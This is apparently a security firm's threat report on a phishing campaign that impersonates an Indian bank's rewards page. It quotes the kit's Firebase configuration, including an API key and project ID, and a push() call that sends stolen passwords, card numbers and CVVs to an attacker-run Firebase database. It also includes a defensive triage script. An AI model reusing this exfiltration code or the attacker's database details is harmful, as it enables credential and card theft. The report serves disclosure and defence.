iZOOlogic’s security team has uncovered a phishing attack targeting the customers of a particular Indian financial services company. Our investigation revealed that this campaign uses a fraudulent mobile-optimised website hosted on Cloudflare’s pages.dev platform to lure unsuspecting users into providing sensitive credentials.
Once victims enter their information, the campaign will capture the details in real time and store them using Google’s Firebase Realtime Database.
The targeted company is an India-based multinational banking and financial services firm headquartered in Mumbai, with more than 100,000 employees.
The attack relies on brand impersonation to promote a fake rewards programme.
The phishing site is a specially crafted website that mimics the financial services company's official rewards programme page. The attackers designed the fake site to deceive mobile users into entering the login credentials, credit card details, and registered mobile numbers for their bank accounts.
Key Tactics Used in this Attack
1. Deceptive URL Structure: The phishing URL resembled the affected firm's official rewards link and was hosted on Cloudflare's reputable pages.dev platform.
2. Firebase Database for Real-Time Data Collection: A notable aspect of this attack is its use of Firebase Realtime Database for storing stolen data. Firebase, a cloud-based service by Google, allows data to be captured and stored instantaneously. Attackers embedded Firebase project URLs within the phishing page’s source code, enabling immediate transfer of credentials entered by victims to Firebase.
Typically, Firebase Realtime Database URLs follow this format:
```
https://<project-id>-default-rtdb.firebaseio.com/.json
```
The project ID yhuth-3f193 found in the phishing website’s source code would yield a database access URL of https://yhuth-3f193-default-rtdb.firebaseio.com/.json. The .json suffix is essential in this setup, as it allows data to be fetched in JSON format directly from the Firebase API.
3. Mobile-Optimised Design: The phishing site is optimised for mobile devices, making it harder for users to spot red flags. Attackers have meticulously replicated the bank's branding, including its colour scheme, logos and terminology. This consistency with the financial service provider's design increases the chance that users will fall for the phishing attempt.
Technical Insights into the Phishing Campaign
A closer inspection of the phishing page’s code reveals a setup involving Firebase’s real-time database, JavaScript, and additional libraries to facilitate data capture and mimic a legitimate banking experience.
Here is a technical breakdown of how this is structured:
- Firebase Configuration: The phishing page contains embedded Firebase API keys and project configuration details to connect directly with the Firebase database.
```javascript
// Firebase web SDK configuration embedded in the phishing page's source
const firebaseConfig = {
  apiKey: "AIzaSyDCzVvz0uVveBUVdT3L3NzTO-NGbeW30wM",
  authDomain: "yhuth-3f193.firebaseapp.com",
  projectId: "yhuth-3f193",
  storageBucket: "yhuth-3f193.appspot.com",
  messagingSenderId: "957618123658",
  appId: "1:957618123658:web:97b9a374a6415b8b480e73"
};
```
- Real-Time Data Collection: When users submit their credentials, they are immediately pushed into Firebase’s database under a designated collection. Attackers can access and monitor this data through the Firebase Realtime Database console or API.
```javascript
import { ref, push } from "firebase/database";

// Firebase modular SDK calls found in the phishing page; `database` and the
// form variables (lc_id, lpass, ...) are defined elsewhere in its source.
const dbRef = ref(database, "users");
push(dbRef, {
  LoginID: lc_id,
  Password: lpass,
  CreditCardNumber: ccnum,
  ExpiryDate: date,
  CVV: cvv,
  CreditCardLimit: limit,
  RegisteredMobileNumber: rgmob,
});
```
[Figure: sample case with screenshot of the live threat on the Firebase database]
- Use of Input Libraries for Enhanced Credibility: To lend further authenticity, the attackers used libraries such as cleave.js to format inputs correctly, prompting users to enter data in expected formats (e.g., 10-digit mobile numbers, formatted credit card numbers). This alignment with banking standards fosters user trust.
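The indicators described above (a firebaseConfig block, a push() call carrying credential and card fields, cleave.js, and a pages.dev host) can be pulled out of a captured page automatically for triage and takedown reporting. The following Python script is an added example written for this article, not code from iZOOlogic or from the phishing kit; it runs over a constructed sample page that reuses the projectId and authDomain quoted above, with a placeholder API key. It extracts the Firebase configuration, derives the Realtime Database REST URL from the project ID, lists the sensitive field names being pushed, and produces a simple indicator-based verdict. It does not contact Firebase or any other host.

```python
"""Extract Firebase-related indicators from a captured phishing page."""
import json
import re
from urllib.parse import urlparse

# Constructed sample modelled on the page structure described in the report.
# projectId/authDomain are the values quoted in the report; the apiKey is a
# placeholder and the hostname is made up.
SAMPLE_URL = "https://bank-rewards-example.pages.dev/offer"
SAMPLE_PAGE = """
<script src="https://cdn.jsdelivr.net/npm/cleave.js@1.6.0/dist/cleave.min.js"></script>
<script type="module">
const firebaseConfig = {
  apiKey: "AIza-EXAMPLE-PLACEHOLDER-KEY",
  authDomain: "yhuth-3f193.firebaseapp.com",
  projectId: "yhuth-3f193",
  storageBucket: "yhuth-3f193.appspot.com",
};
const dbRef = ref(database, "users");
push(dbRef, {
  LoginID: lc_id,
  Password: lpass,
  CreditCardNumber: ccnum,
  CVV: cvv,
  RegisteredMobileNumber: rgmob,
});
</script>
"""

# Substrings that mark a pushed field as credential or card data.
SENSITIVE_FIELD_WORDS = ("password", "cvv", "card", "pin", "otp", "mobile")


def extract_firebase_config(html: str) -> dict:
    """Return key/value pairs of a firebaseConfig object literal, or {}."""
    m = re.search(r"firebaseConfig\s*=\s*\{(.*?)\}", html, re.S)
    if not m:
        return {}
    # Accept straight or curly double quotes, as seen in extracted page copies.
    return dict(re.findall(r'(\w+)\s*:\s*["“]([^"”]+)["”]', m.group(1)))


def rtdb_rest_url(project_id: str) -> str:
    """Realtime Database REST URL in the default-rtdb format shown above."""
    return f"https://{project_id}-default-rtdb.firebaseio.com/.json"


def pushed_field_names(html: str) -> list:
    """Field names of every object literal passed to push(ref, {...})."""
    names = []
    for body in re.findall(r"push\(\s*\w+\s*,\s*\{(.*?)\}\s*\)", html, re.S):
        names.extend(re.findall(r"(\w+)\s*:", body))
    return names


def analyse_page(url: str, html: str) -> dict:
    """Collect indicators from a captured page and return a triage summary."""
    host = urlparse(url).hostname or ""
    cfg = extract_firebase_config(html)
    fields = pushed_field_names(html)
    sensitive = [f for f in fields
                 if any(w in f.lower() for w in SENSITIVE_FIELD_WORDS)]
    indicators = []
    if host.endswith(".pages.dev"):
        indicators.append("hosted on a free pages.dev subdomain")
    if cfg.get("projectId"):
        indicators.append(f"embedded Firebase project {cfg['projectId']}")
    if sensitive:
        indicators.append("credential/card fields pushed to Firebase: "
                          + ", ".join(sensitive))
    if "cleave" in html.lower():
        indicators.append("cleave.js input formatting present")
    return {
        "host": host,
        "firebase_config": cfg,
        "rtdb_url": rtdb_rest_url(cfg["projectId"]) if cfg.get("projectId") else None,
        "sensitive_fields": sensitive,
        "indicators": indicators,
        # Threshold is a constructed heuristic for this example.
        "verdict": "likely credential phishing" if len(indicators) >= 3 else "needs review",
    }


if __name__ == "__main__":
    print(json.dumps(analyse_page(SAMPLE_URL, SAMPLE_PAGE), indent=2))
```

The derived rtdb_url and the projectId are the values an analyst would include in an abuse report to Google and in the IoC list; the verdict threshold is deliberately simple and should be tuned against a corpus of captured pages before being used in an automated pipeline.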
Indicators of Compromise (IOCs)
Security Implications of the Phishing Attack
The misuse of the Firebase Realtime Database in this attack highlights a troubling trend in which cybercriminals abuse trusted cloud platforms for malicious purposes. Firebase's real-time data storage allows sensitive information to be captured immediately as it is entered, which removes the attacker's need to run any infrastructure of their own.
Our iZOOlogic researchers urge banking customers to follow these critical security practices to guard against phishing attacks. First, they should verify URLs carefully, especially on mobile devices, by checking for official domain patterns and avoiding unfamiliar links.
They should also employ two-factor authentication (2FA) to add another layer of security, as it helps secure accounts even if credentials are compromised. Lastly, promptly reporting suspicious sites to security authorities can help quickly take down malicious sites and alert other users to potential risks.